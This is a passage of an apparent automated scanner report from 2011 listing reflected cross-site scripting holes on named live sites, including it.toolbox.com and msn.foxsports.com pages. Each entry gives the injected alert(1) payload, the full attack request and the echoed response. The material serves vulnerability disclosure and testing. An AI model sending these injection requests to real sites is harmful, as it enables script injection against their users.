document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.133. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/db2zos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2553e'-alert(1)-'a0a7b564b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2zos?2553e'-alert(1)-'a0a7b564b7=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78368
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Getting the ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%262553e'-alert(1)-'a0a7b564b7%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.134. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/elsua
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3acb'-alert(1)-'93981464ca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/elsua?f3acb'-alert(1)-'93981464ca0=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> elsua: The ...[SNIP]... er != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26f3acb'-alert(1)-'93981464ca0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.135. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/juice-analytics
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79855'-alert(1)-'e9a3a93587c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/juice-analytics?79855'-alert(1)-'e9a3a93587c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61934
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Juice Analy ...[SNIP]... tnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2679855'-alert(1)-'e9a3a93587c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.136. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/minimalit
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3719a'-alert(1)-'3be2065b10e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/minimalit?3719a'-alert(1)-'3be2065b10e=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title> Minimal IT:
...[SNIP]...
= ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%263719a'-alert(1)-'3be2065b10e%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.137. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/penguinista-databasiensis
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f871'-alert(1)-'61cc9848b43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/penguinista-databasiensis?2f871'-alert(1)-'61cc9848b43=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title> Penguinista
...[SNIP]...
1.138. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f740'-alert(1)-'6ebdefa1aa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday?1f740'-alert(1)-'6ebdefa1aa5=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title> Future Stat
...[SNIP]...
!= ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%261f740'-alert(1)-'6ebdefa1aa5%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d10fd<script>alert(1)</script>5443b795f8c was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98161"%3balert(1)//e83152febaa was submitted in the l parameter. This input was echoed as 98161";alert(1)//e83152febaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161"%3balert(1)//e83152febaa&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=0&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265
Response
HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 11135
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7bc"-alert(1)-"ecbff65bd55 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=09d7bc"-alert(1)-"ecbff65bd55&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265
Response
HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 10579
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 73495<script>alert(1)</script>00d7074f8fe was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=2&hotelId=11536&mbox=Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe&mboxId=0&mboxTime=1296552397746&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1
Host: millenniumhotels.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 217
Date: Wed, 02 Feb 2011 15:36:11 GMT
Server: Test & Target
1.143. http://msn.foxsports.com/cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b51f6'-alert(1)-'4ced383f894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cbk/story/Texas-trounces-Texas-A&M-for-Big-12-win-013111?b51f6'-alert(1)-'4ced383f894=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253307
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Wed, 02 Feb 2011 15:37:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26549032'); // load up team comments </script> ...[SNIP]...
1.144. http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14d4a'-alert(1)-'ab313af8cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /collegefootball/lists/scout-top-25-team-recruit-rankings?14d4a'-alert(1)-'ab313af8cd3=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 242788
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=53
Date: Wed, 02 Feb 2011 15:37:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '24'); // load up team comments </script> ...[SNIP]...
1.145. http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93cfb'-alert(1)-'bea40c5b74b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111?93cfb'-alert(1)-'bea40c5b74b=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 256587
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=43
Date: Wed, 02 Feb 2011 15:37:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26511070'); // load up team comments </script> ...[SNIP]...
1.146. http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dcc0'-alert(1)-'c4dbd5116c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111?2dcc0'-alert(1)-'c4dbd5116c5=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 245955
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=36
Date: Wed, 02 Feb 2011 15:37:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26546002'); // load up team comments </script> ...[SNIP]...
1.147. http://msn.foxsports.com/nba/page/heat-or-threepeat [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://msn.foxsports.com
Path: /nba/page/heat-or-threepeat
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d60'-alert(1)-'1f301dec17c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/page/heat-or-threepeat?f4d60'-alert(1)-'1f301dec17c=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247480
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=22
Date: Wed, 02 Feb 2011 15:37:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', 'EVENT_295449'); // load up team comments </script> ...[SNIP]...
1.148. http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://msn.foxsports.com
Path: /nba/story/Mavericks-102-Wizards-92-01372633
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f35a8'-alert(1)-'4bf9c40ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Mavericks-102-Wizards-92-01372633?f35a8'-alert(1)-'4bf9c40ab7=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250652
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=11
Date: Wed, 02 Feb 2011 15:37:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26551003'); // load up team comments </script> ...[SNIP]...
1.149. http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42b34'-alert(1)-'dc8cb17c584 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111?42b34'-alert(1)-'dc8cb17c584=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 261871
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 104a6'-alert(1)-'eed66588032 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002104a6'-alert(1)-'eed66588032 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227087
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=48
Date: Wed, 02 Feb 2011 15:37:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '5'); // load up team comments </script> ...[SNIP]...
1.151. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://msn.foxsports.com
Path: /nfl/lists/Top_10_Super_Bowl_Goats
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3309'-alert(1)-'0aa3faa4c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Goats?a3309'-alert(1)-'0aa3faa4c6a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226893
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Tue, 01 Feb 2011 15:36:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14557'-alert(1)-'f363dc20028 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Heroes?GT1=3900214557'-alert(1)-'f363dc20028 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226622
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=45
Date: Wed, 02 Feb 2011 15:37:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
